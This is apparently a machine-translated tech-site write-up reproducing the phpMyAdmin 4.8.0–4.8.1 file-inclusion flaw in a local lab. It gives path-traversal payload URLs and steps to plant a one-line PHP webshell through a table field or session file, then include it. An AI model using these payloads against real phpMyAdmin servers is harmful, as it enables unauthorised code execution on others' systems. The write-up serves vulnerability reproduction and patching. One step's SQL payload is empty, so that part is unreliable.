Shulou(Shulou.com)05/31 Report--

How to understand the phpMyAdmin file contains loopholes recurrence, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain in detail for you, people with this need can come to learn, I hope you can gain something.

Introduction to 0x00

PhpMyAdmin is a database management tool based on PHP and constructed on the host of the website in the way of Web-Base, which allows managers to use Web interface to manage MySQL database. Through this Web interface, it can become a better way to input complicated SQL syntax in a simple way, especially to deal with the import and export of a large amount of data. One of the bigger advantages is that phpMyAdmin runs on the web server like other PHP programs, but you can use the HTML pages generated by these programs anywhere, that is, to manage the MySQL database remotely, and to easily create, modify, and delete databases and tables. You can also use phpMyAdmin to establish a commonly used php syntax to facilitate the correctness of sql syntax needed when writing web pages.

Overview of 0x01 vulnerabilities

Attackers exploit vulnerabilities that include (view and potentially execute) files on the server. The vulnerability comes from part of the code in which the page is redirected and loaded in phpMyAdmin, as well as improper testing of whitelist pages. The attacker must be authenticated, except in these cases:

$cfg ['AllowArbitraryServer'] = true: an attacker can specify any host he or she has control and execute arbitrary code on the phpMyAdmin

$cfg ['ServerDefault'] = 0: this bypasses login and runs vulnerable code without any authentication.

0x02 scope of influence

PhpMyAdmin 4.8.0

PhpMyAdmin 4.8.1

0x03 environment building

Phpstudy2018+phpmyadmin4.8.1

1. Download phpstudy2018 and delete your own phpmyadmin

Download address: http://public.xp.cn/upgrades/PhpStudy2018.zip

two。 Download the phpmyadmin4.8.1 version

Download address: https://www.phpmyadmin.net/files/

3. Rename the downloaded phpmyadmin in phpstudy's www directory

4. View the version of phpmyadmin in the browser

Http://your-IP/phpmyadmin/README

Recurrence of 0x04 vulnerabilities

1. To open phpmyadmin in a browser, you need to log in with an account / / show a little chicken rib.

two。 Method 1. Log in and enter the following payload on the home page

Http://your-ip/phpMyAdmin/index.php?target=db_datadict.php%253f/../../../../../../../../Windows\win.ini

3. Create a table in the test database, and then create a field in the table as an one-sentence Trojan

4. Check whether a frm file is generated under the corresponding database of MySQL/data in the injured machine and open it using notepad.

5. Use file include, include files under this path

Http://your-ip/phpMyAdmin/index.php?target=db_datadict.php%253f/../../../../../../../../phpStudy\PHPTutorial\MySQL\data\test\demo.frm

6. Method 2. Save the serialized data to the session file through phpsession, including its cache file. Through a word Trojan, and then include the sess_sessionId file.

6.1. execute the following command at the latest sql statement

Select''

6.2. use F12 to view the session value of the website and the value of phpmyadmin in the current page cookie

6.3.Use the file to contain the URL path that contains the session value in this directory

0x05 repair recommendation

1. The latest version of phpmyadmin is recommended

two。 Use complex account passwords

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.